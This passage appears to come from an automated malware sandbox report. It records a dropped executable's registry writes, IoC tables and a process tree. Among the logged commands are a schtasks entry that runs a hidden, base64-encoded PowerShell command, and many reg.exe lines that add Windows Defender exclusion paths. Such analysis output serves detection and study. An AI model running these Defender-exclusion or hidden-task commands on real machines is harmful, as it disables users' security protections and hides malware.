Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	nPeHffteYySCvLPa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	nPeHffteYySCvLPa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	nPeHffteYySCvLPa.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.EXEnPeHffteYySCvLPa.exe

pid	process
980	powershell.EXE
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe
824	nPeHffteYySCvLPa.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.EXE

description pid process

Token: SeDebugPrivilege 980 powershell.EXE

description	pid	process
Token: SeDebugPrivilege	980	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

rundll32.exerundll32.exenPeHffteYySCvLPa.exetaskeng.exepowershell.EXEcmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1876 wrote to memory of 1132	1876	rundll32.exe	rundll32.exe
PID 1132 wrote to memory of 824	1132	rundll32.exe	nPeHffteYySCvLPa.exe
PID 1132 wrote to memory of 824	1132	rundll32.exe	nPeHffteYySCvLPa.exe
PID 1132 wrote to memory of 824	1132	rundll32.exe	nPeHffteYySCvLPa.exe
PID 1132 wrote to memory of 824	1132	rundll32.exe	nPeHffteYySCvLPa.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 1688 wrote to memory of 980	1688	taskeng.exe	powershell.EXE
PID 1688 wrote to memory of 980	1688	taskeng.exe	powershell.EXE
PID 1688 wrote to memory of 980	1688	taskeng.exe	powershell.EXE
PID 980 wrote to memory of 1980	980	powershell.EXE	gpupdate.exe
PID 980 wrote to memory of 1980	980	powershell.EXE	gpupdate.exe
PID 980 wrote to memory of 1980	980	powershell.EXE	gpupdate.exe
PID 824 wrote to memory of 1188	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1188	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1188	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 1188	824	nPeHffteYySCvLPa.exe	schtasks.exe
PID 824 wrote to memory of 996	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 996	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 996	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 996	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 996 wrote to memory of 1648	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1648	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1648	996	cmd.exe	reg.exe
PID 996 wrote to memory of 1648	996	cmd.exe	reg.exe
PID 824 wrote to memory of 308	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 308	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 308	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 308	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 308 wrote to memory of 904	308	cmd.exe	reg.exe
PID 308 wrote to memory of 904	308	cmd.exe	reg.exe
PID 308 wrote to memory of 904	308	cmd.exe	reg.exe
PID 308 wrote to memory of 904	308	cmd.exe	reg.exe
PID 824 wrote to memory of 972	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 972	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 972	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 972	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 972 wrote to memory of 936	972	cmd.exe	reg.exe
PID 972 wrote to memory of 936	972	cmd.exe	reg.exe
PID 972 wrote to memory of 936	972	cmd.exe	reg.exe
PID 972 wrote to memory of 936	972	cmd.exe	reg.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 1540	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 1540 wrote to memory of 1036	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1036	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1036	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1036	1540	cmd.exe	reg.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	cmd.exe
PID 824 wrote to memory of 668	824	nPeHffteYySCvLPa.exe	cmd.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#1
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1132

C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe
"C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\nPeHffteYySCvLPa.exe" /S
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:824

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNirhxbcT" /SC once /ST 05:39:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1540

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNirhxbcT"
4⤵
PID:668

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNirhxbcT"
4⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
4⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1648

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
4⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
5⤵
PID:904

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
4⤵
- Suspicious use of WriteProcessMemory
PID:972

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
5⤵
PID:936

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
4⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1036

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\mXZOChzNWSbPIDPW\ToHdTqvg\KgMrcGGPuAWwFXOa.wsf"
4⤵
PID:668

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\mXZOChzNWSbPIDPW\ToHdTqvg\KgMrcGGPuAWwFXOa.wsf"
4⤵
PID:780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:32
5⤵
PID:616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:64
5⤵
PID:436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:32
5⤵
PID:608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:32
5⤵
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:64
5⤵
PID:2040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mXZOChzNWSbPIDPW" /t REG_DWORD /d 0 /reg:64
5⤵
PID:940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:64
5⤵
PID:664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:64
5⤵
PID:812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:64
5⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:64
5⤵
PID:828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:32
5⤵
PID:904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1296

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:32
5⤵
PID:548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ehtkUBLERmscXYVB" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1400

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ" /t REG_DWORD /d 0 /reg:32
5⤵
PID:888

C:\Windows\SysWOW64\reg.exe
